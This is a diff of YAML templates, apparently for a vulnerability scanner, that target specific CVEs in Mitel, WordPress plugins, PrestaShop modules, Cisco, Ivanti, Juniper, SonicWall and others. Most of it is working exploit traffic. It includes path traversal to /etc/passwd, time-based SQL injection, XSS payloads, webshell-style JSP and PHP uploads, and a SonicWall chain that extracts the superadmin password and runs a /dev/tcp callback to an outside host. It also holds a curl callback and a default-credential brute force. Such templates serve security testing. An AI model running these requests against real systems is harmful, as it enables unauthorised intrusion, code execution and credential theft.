+      - type: word
+        part: header
+        words:
+          - "application/binary"
+
+      - type: status
+        status:
+          - 200

http/cves/2020/CVE-2020-11798.yaml

@@ -0,0 +1,43 @@
+id: CVE-2020-11798
+
+info:
+  name: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal
+  author: ritikchaddha
+  severity: medium
+  description: |
+    A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.
+  reference:
+    - https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11798
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-22
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: html:"Mitel" html:"MiCollab"
+  tags: cve,cve2020,mitel,micollab,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - application/x-download
+          - filename=passwd
+        condition: and
+
+      - type: status
+        status:
+          - 200

http/cves/2020/CVE-2020-28185.yaml

@@ -38,9 +38,9 @@ http:
       - type: word
         part: body
         words:
-          - "username"
-          - "email"
-          - "status"
+          - '"username":'
+          - '"email":'
+          - '"status":'
         condition: and
 
       - type: status

http/cves/2021/CVE-2021-24956.yaml

@@ -0,0 +1,50 @@
+id: CVE-2021-24956
+
+info:
+  name: Blog2Social < 6.8.7 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.
+  remediation: Fixed in version 6.8.7
+  reference:
+    - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24956
+  classification:
+    cve-id: CVE-2021-24956
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin.php?page=blog2social&b2sShowByDate="><script>alert(document.domain)</script>  HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>" name='
+          - 'Your Activity'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

http/cves/2022/CVE-2022-22897.yaml

@@ -0,0 +1,53 @@
+id: CVE-2022-22897
+
+info:
+  name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection
+  author: mastercho
+  severity: critical
+  description: |
+    A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22897
+    - https://packetstormsecurity.com/files/cve/CVE-2022-22897
+    - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-22897
+    cwe-id: CWE-89
+  metadata:
+    max-request: 2
+    shodan-query: http.component:"Prestashop"
+    verified: true
+  tags: cve,cve2022,prestashop,sqli,unauth
+
+http:
+  - raw:
+      - |
+        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{RootURL}}
+        X-Requested-With: XMLHttpRequest
+
+        leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
+
+      - |
+        GET /modules/appagebuilder/config.xml HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: version
+        part: body_2
+        internal: true
+        group: 1
+        regex:
+          - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_1>=6'
+          - 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")'
+        condition: and

http/cves/2022/CVE-2022-31879.yaml

@@ -2,7 +2,7 @@ id: CVE-2022-31879
 
 info:
   name: Online Fire Reporting System v1.0 - SQL injection
-  author: theamanrawat
+  author: theamanrawat,j4vaovo
   severity: high
   description: |
     Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.
@@ -18,8 +18,8 @@ info:
     epss-score: 0.04694
     cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
-    verified: "true"
+    max-request: 2
+    verified: true
     vendor: online_fire_reporting_system_project
     product: online_fire_reporting_system
   tags: cve,cve2022,sqli,online-fire-reporting
@@ -27,15 +27,20 @@ info:
 http:
   - raw:
       - |
-        @timeout: 10s
-        GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1
+        @timeout: 15s
+        GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        @timeout: 15s
+        GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=6'
-          - 'status_code == 200'
-          - 'contains(content_type, "text/html")'
-          - 'contains(body, "Dashboard")'
+          - 'status_code_1 == 200 && status_code_2 == 200'
+          - 'duration_2 - duration_1 >= 7'
+          - 'contains(content_type_2, "text/html")'
+          - 'contains(body_2, "Dashboard")'
         condition: and

http/cves/2022/CVE-2022-47615.yaml

@@ -0,0 +1,50 @@
+id: CVE-2022-47615
+
+info:
+  name: LearnPress Plugin < 4.2.0 - Local File Inclusion
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
+  reference:
+    - https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-47615
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-434
+  metadata:
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/learnpress"
+    verified: true
+  tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi
+
+
+http:
+  - raw:
+      - |
+        GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: body
+        words:
+          - '"status":'
+          - '"pagination":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200

http/cves/2023/CVE-2023-20073.yaml

@@ -0,0 +1,79 @@
+id: CVE-2023-20073
+
+info:
+  name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload
+  author: princechaddha,ritikchaddha
+  severity: critical
+  description: |
+    A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
+  reference:
+    - https://unsafe.sh/go-173464.html
+    - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f
+    - https://github.com/RegularITCat/CVE-2023-20073/tree/main
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-20073
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-20073
+    cwe-id: CWE-434
+    cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
+    epss-score: 0.0014
+  metadata:
+    fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P"
+    max-request: 3
+    product: rv340_firmware
+    vendor: cisco
+    verified: true
+  tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive
+
+variables:
+  html_comment: "<!-- {{randstr}} -->" # Random string as HTML comment to append in response body
+
+http:
+  - raw:
+      - |
+        GET /index.html HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: 1
+        Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf
+
+        --------------------------f6f99e26f3a45adf
+        Content-Disposition: form-data; name="pathparam"
+
+        Portal
+        --------------------------f6f99e26f3a45adf
+        Content-Disposition: form-data; name="fileparam"
+
+        index.html
+        --------------------------f6f99e26f3a45adf
+        Content-Disposition: form-data; name="file.path"
+
+        index.html
+        --------------------------f6f99e26f3a45adf
+        Content-Disposition: form-data; name="file"; filename="index.html"
+        Content-Type: application/octet-stream
+
+        {{index}}
+        {{html_comment}}
+
+        --------------------------f6f99e26f3a45adf--
+      - |
+        GET /index.html HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: dsl
+        name: index
+        internal: true
+        dsl:
+          - body_1
+
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - "{{html_comment}}"

http/cves/2023/CVE-2023-27034.yaml

@@ -0,0 +1,69 @@
+id: CVE-2023-27034
+info:
+  name: Blind SQL injection vulnerability in Jms Blog
+  author: MaStErChO
+  severity: critical
+  description: |
+    The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
+    - https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
+    - https://github.com/advisories/GHSA-7jr7-v6gv-m656
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-27034
+    cwe-id: CWE-89
+  metadata:
+    max-request: 2
+  tags: cve,cve2023,prestashop,prestashop-module,sqli
+
+http:
+  - raw:
+      - |
+        @timeout: 12s
+        POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
+        Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
+        X-Requested-With: XMLHttpRequest
+        Referer: {{RootURL}}
+        Host: {{Hostname}}
+        Connection: Keep-alive
+
+        ------------YWJkMTQzNDcw
+        Content-Disposition: form-data; name="comment"
+
+        555
+        ------------YWJkMTQzNDcw
+        Content-Disposition: form-data; name="customer_name"
+
+
+        ------------YWJkMTQzNDcw
+        Content-Disposition: form-data; name="email"
+
+        0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
+        ------------YWJkMTQzNDcw
+        Content-Disposition: form-data; name="post_id"
+
+        1
+        ------------YWJkMTQzNDcw
+        Content-Disposition: form-data; name="post_id_comment_reply"
+
+        1
+        ------------YWJkMTQzNDcw
+        Content-Disposition: form-data; name="submitComment"
+
+        submitComment=
+        ------------YWJkMTQzNDcw--
+
+      - |
+        GET /modules/jmsblog/config.xml HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_1>=6'
+          - 'contains(body_2, "Jms Blog")'
+        condition: and

http/cves/2023/CVE-2023-30150.yaml

@@ -0,0 +1,40 @@
+id: CVE-2023-30150
+
+info:
+  name: PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection
+  author: mastercho
+  severity: critical
+  description: |
+    PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30150
+    - https://security.friendsofpresta.org/module/2023/06/06/leocustomajax.html
+    - https://www.tenable.com/cve/CVE-2023-30150
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-30150
+    cwe-id: CWE-89
+  metadata:
+    max-request: 2
+    shodan-query: http.component:"Prestashop"
+    verified: true
+  tags: cve,cve2023,prestashop,sqli
+
+http:
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_2>=6'
+          - 'contains(tolower(response_1), "prestashop")'
+        condition: and

http/cves/2023/CVE-2023-32563.yaml

@@ -0,0 +1,54 @@
+id: CVE-2023-32563
+
+info:
+  name: Ivanti Avalanche - Remote Code Execution
+  author: princechaddha
+  severity: critical
+  description: An unauthenticated attacker could achieve the code execution through a RemoteControl server.
+  reference:
+    - https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
+    - https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-32563
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-32563
+    cwe-id: CWE-22
+    cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
+    epss-score: 0.01048
+  metadata:
+    max-request: 2
+    product: avalanche
+    vendor: ivanti
+  tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive
+
+http:
+  - raw:
+      - |
+        POST /Servlet/Skins HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 333
+        Content-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f
+        Connection: close
+
+        --------------------------eacf31f23ac1829f
+        Content-Disposition: form-data; name="guid"
+
+        ../../../Web/webapps/ROOT
+        --------------------------eacf31f23ac1829f
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
+
+        <%
+        out.println("CVE-2023-32563");
+        %>
+        --------------------------eacf31f23ac1829f--
+
+      - |
+        GET /{{randstr}}.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "CVE-2023-32563"

http/cves/2023/CVE-2023-34124.yaml

@@ -0,0 +1,88 @@
+id: CVE-2023-34124
+
+info:
+  name: SonicWall GMS and Analytics Web Services - Shell Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions
+  reference:
+    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+    - https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
+    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
+    - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-34124
+  classification:
+    cve-id: CVE-2023-34124
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-287
+  metadata:
+    max-request: 4
+    verified: true
+    shodan-query: http.favicon.hash:-1381126564
+  tags: cve,cve2023,sonicwall,shell,injection,auth-bypass,instrusive
+
+variables:
+  callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
+  query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
+  secret: '?~!@#$%^^()'
+  auth: "{{hmac('sha1', query, secret)}}"
+  filename: "{{rand_base(5)}}"
+
+http:
+  - raw:
+      - |
+        GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
+        Host: {{Hostname}}
+        Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}
+
+      - |
+        GET /appliance/login HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /appliance/applianceMainPage HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0
+
+      - |
+        POST /appliance/applianceMainPage HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - "<title>SonicWall Universal Management Appliance</title>"
+          - "<title>SonicWall Universal Management Host</title>"
+        condition: or
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+    extractors:
+      - type: json
+        part: body
+        internal: true
+        name: alias
+        group: 1
+        json:
+          - '.alias'
+
+      - type: regex
+        part: body
+        internal: true
+        name: servertoken
+        group: 1
+        regex:
+          - "getPwdHash.*,'([0-9]+)'"

http/cves/2023/CVE-2023-36844.yaml

@@ -0,0 +1,79 @@
+id: CVE-2023-36844
+
+info:
+  name: Juniper Devices - Remote Code Execution
+  author: princechaddha,ritikchaddha
+  severity: critical
+  description: |
+    Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
+  reference:
+    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
+    - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844
+    - https://supportportal.juniper.net/JSA72300
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847
+    cwe-id: CWE-473
+    epss-score: 0.00046
+    cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 3
+    verified: true
+    shodan-query: title:"Juniper Web Device Manager"
+    vendor: juniper
+    product: junos
+  tags: cve,cve2023,juniper,php,rce,intrusive,fileupload
+
+variables:
+  value: "CVE-2023-36844"
+  payload: "('<?php echo md5('{{value}}');?>')"
+
+http:
+  - raw:
+      - |
+        POST /webauth_operation.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}]
+
+      - |
+        POST /webauth_operation.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }]
+
+      - |
+        GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '"original_fileName":'
+          - '"converted_fileName":'
+        condition: and
+
+      - type: word
+        part: body_3
+        words:
+          - '{{md5(value)}}'
+
+    extractors:
+      - type: regex
+        part: body_1
+        name: phpfile
+        regex:
+          - "([a-f0-9]{64}\\.php)"
+        internal: true
+
+      - type: regex
+        part: body_2
+        name: inifile
+        regex:
+          - "([a-f0-9]{64}\\.ini)"
+        internal: true

http/cves/2023/CVE-2023-38035.yaml

@@ -0,0 +1,44 @@
+id: CVE-2023-38035
+
+info:
+  name: Ivanti Sentry - Authentication Bypass
+  author: DhiyaneshDk,iamnoooob,rootxharsh
+  severity: critical
+  description: |
+    A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
+  reference:
+    - https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface
+    - https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/
+    - https://github.com/horizon3ai/CVE-2023-38035
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-38035
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-38035
+    epss-score: 0.01575
+  metadata:
+    max-request: 1
+    shodan-query: 'html:"Note: Requires a local Sentry administrative user"'
+    verified: true
+  tags: cve,cve2023,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast
+
+variables:
+  oast: "{{interactsh-url}}/?"
+  padstr: "{{randstr}}"
+
+http:
+  - raw:
+      - |
+        POST /mics/services/MICSLogService HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, 'isRunningTzz')
+          - contains(interactsh_protocol, 'dns')
+          - status_code == 200
+        condition: and

http/cves/2023/CVE-2023-39026.yaml

@@ -0,0 +1,32 @@
+id: CVE-2023-39026
+
+info:
+  name: FileMage Gateway - Directory Traversal
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
+  reference:
+    - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
+    - https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-39026
+  classification:
+    cve-id: CVE-2023-39026
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"FileMage"
+  tags: cve,cve2023,lfi,filemage
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains_all(body,'bit app support','extensions','fonts')"
+          - "contains(content_type, 'text/plain')"
+          - "status_code == 200"
+        condition: and

http/cves/2023/CVE-2023-39141.yaml

@@ -0,0 +1,30 @@
+id: CVE-2023-39141
+
+info:
+  name: Aria2 WebUI - Path traversal
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.
+  reference:
+    - https://twitter.com/win3zz/status/1694239332465520684
+    - https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e
+    - https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10
+  metadata:
+    max-request: 2
+    shodan-query: title:"Aria2 WebUI"
+    verified: true
+  tags: lfi,unauth,aria2,webui
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/../../../../etc/passwd"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_1, "Aria2 WebUI")'
+          - 'regex("root:x:0:0:",body_2)'
+        condition: and

http/cves/2023/CVE-2023-3936.yaml

@@ -0,0 +1,47 @@
+id: CVE-2023-3936
+
+info:
+  name: Blog2Social < 7.2.1 - Cross-Site Scripting
+  author: luisfelipe146
+  severity: medium
+  description: |
+    The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
+  reference:
+    - https://wpscan.com/vulnerability/6d09a5d3-046d-47ef-86b4-c024ea09dc0f
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3936
+  classification:
+    cve-id: CVE-2023-3936
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2023,wordpress,wp-plugin,xss,authenticated
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Deleted 1<img src onerror=alert(document.domain)> posts"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

http/default-logins/apache/kylin-default-login.yaml

@@ -0,0 +1,53 @@
+id: kylin-default-login
+
+info:
+  name: Apache Kylin Console - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    The default password for the Apache Kylin Console is KYLIN for the ADMIN user in Kylin versions before 3.0.0.
+  reference:
+    - https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml
+    - https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker
+  metadata:
+    fofa-query: app="APACHE-kylin"
+    max-request: 6
+    verified: true
+  tags: kylin,default-login,apache
+
+http:
+  - raw:
+      - |
+        GET /kylin/api/user/authentication  HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    attack: clusterbomb
+    payloads:
+      username:
+        - ADMIN
+        - admin
+      password:
+        - KYLIN
+        - kylin
+        - 123456
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"userDetails":'
+          - '"username":'
+          - '"password":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200

http/default-logins/dell/dell-idrac-default-login.yaml

@@ -2,7 +2,7 @@ id: dell-idrac-default-login
 
 info:
   name: Dell iDRAC6/7/8 Default Login
-  author: kophjager007
+  author: kophjager007,megamansec
   severity: high
